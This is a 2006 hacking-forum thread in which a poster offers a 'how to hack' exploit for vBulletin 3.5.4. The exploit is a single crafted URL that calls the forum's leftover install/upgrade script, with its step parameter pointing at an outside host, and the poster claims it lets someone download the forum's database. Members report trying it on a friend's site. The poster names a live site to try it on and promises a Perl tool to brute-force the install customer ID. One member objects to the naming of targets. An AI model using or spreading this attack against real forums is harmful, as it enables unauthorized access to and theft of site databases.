Jump to content


Photo
- - - - -

How to hack a vbulletin 3.5.4 (Video)


  • Please log in to reply
35 replies to this topic

#1 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:06 PM

Hello,

Here I will show you how to hack a vBulletin 3.5.4:

video:
http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
exploit:
##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################

Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :

Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com

########################################
Exploit:

www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com

when it works, you can still download the database.....

########################################
Contact:

Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com

Edited by M4k3, 05 July 2006 - 02:35 PM.


#2 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:14 PM

From what I remember, when you install VBulletin and get done with it, doesn't it make you delete the /install/ folder and everything under it?

EDIT: Just tried it on a friends site, you need to have a Customer ID in order to continue with the step

Edited by Trikk, 05 July 2006 - 02:16 PM.


#3 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:16 PM

You only delete the index.php, in the folder.

check it out on this site:
undergr0und.net

Edited by M4k3, 05 July 2006 - 02:16 PM.


#4 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:25 PM

That site does not have a vBulletin forum :huh:

Underground Electronic Network Security Lab.
www.undergr0und.net

Powered by zero blog


EDIT: ruiner zer0 - didn't he use to be on the CIA forums? :blink:

Edited by Trikk, 05 July 2006 - 02:26 PM.


#5 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:26 PM

Man.....i think you will be able to find the forum path.........

http://undergr0und.net/forum/index.php

#6 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:28 PM

heh, it wasn't links on the main site.

very nice though

Edited by Trikk, 05 July 2006 - 02:31 PM.


#7 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:30 PM

Thx, now i will try to make a perl exploit for it.

Because when you would enter on many boards /install/ you need a number and i will write a code who will break it down.

#8 tehbizz

tehbizz

    Progenitor of noob slaying

  • Members
  • 2,039 posts
  • Gender:Male

Posted 05 July 2006 - 02:34 PM

This *is* a remote exploit, change your header.

BTW, please spell check this thing, it's vBulletin not vbulltin.

#9 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:35 PM

Oh....thx for this..i have change it.

#10 kitche

kitche

    Hakker addict

  • Members
  • 549 posts

Posted 05 July 2006 - 07:37 PM

umm most of the exploits are usually for null

#11 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 04:10 PM

How do you detect if the forum is vulnerable?(besides the manual way).
Or is there anyway to bruteforce the customer key?

Oh yeah and all the forums in the vid are patched : <

Edited by xof7, 06 July 2006 - 04:10 PM.


#12 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 06 July 2006 - 04:18 PM

Well, you have try it on nulled version.

I will make a new exploits who will break down the number code what you have enter.

The Forums are now protected....because i have warn the admins...

#13 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 04:23 PM

Hey guys, I don't mean to rain on any parades here, or backseat mod... but:

1.) Should you really be so openly talking about specific vulnerable sites on the internet? Sure does look like you're intending to penetrate them. This is a forum that appears on Google, is it beyond belief that the Feds are reading this very post?

2.) Shouldn't this be in the Newbie HQ? Youve got a video showing how to run a perl script? I mean, it's pretty cool that you found this vulnerability (or did you just write the 'sploit?) but do we _really_ need to be handing children the proverbial handgun? Anyone who uses this script isn't automaticaly a "hacker", they just watched a video. No different than kids running winnuke (in terms of skill level), am I wrong?

Enabling script kiddies doesn't make you a hacker, it just ensures the three letter agencies will open a dossier on you.

#14 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 06 July 2006 - 04:30 PM

Then you have to create a forum....for people who have more knowlege then other.

#15 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 04:35 PM

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.

#16 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 05:02 PM

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.



There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on and, burning with obsession to understand it all.

If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?) how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, than you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know linux, and if they don't know linux than what are they going to do once they gain access into the box?

I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.

I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...

[edit: typos]

Edited by stonersavant, 06 July 2006 - 05:04 PM.


#17 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 05:16 PM


How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.



There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on and, burning with obsession to understand it all.

If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?) how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, than you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know linux, and if they don't know linux than what are they going to do once they gain access into the box?

I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.

I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...

[edit: typos]


lol. did u even watch the vid for the exploit or read his post?

#18 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 05:25 PM

Sure I did. Did you completely forget about the part, just a few posts above ours, where you are pointing out specific sites to attack? Looks like you had the good sense to edit them out.

Come on guys, this isn't a leetness pissing contest.

Edited by stonersavant, 06 July 2006 - 05:28 PM.


#19 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 07 July 2006 - 03:01 PM

All you do in this vuln is append a directory, a file name, and an argument to the file. this is hardly even an exploit... With something so easy it should be obvious that the newbs are going to be rushing to it somehow.

#20 Eggman

Eggman

    DDP Fan club member

  • Members
  • 53 posts
  • Location:aisle 9

Posted 08 July 2006 - 08:16 PM

So it seems that by setting up a password durring the vB install this "exploit" is overcome. Thanks for putting what you got up for others to see but it seems that this would only work on an idiot's site.




BinRev is hosted by the great people at Lunarpages!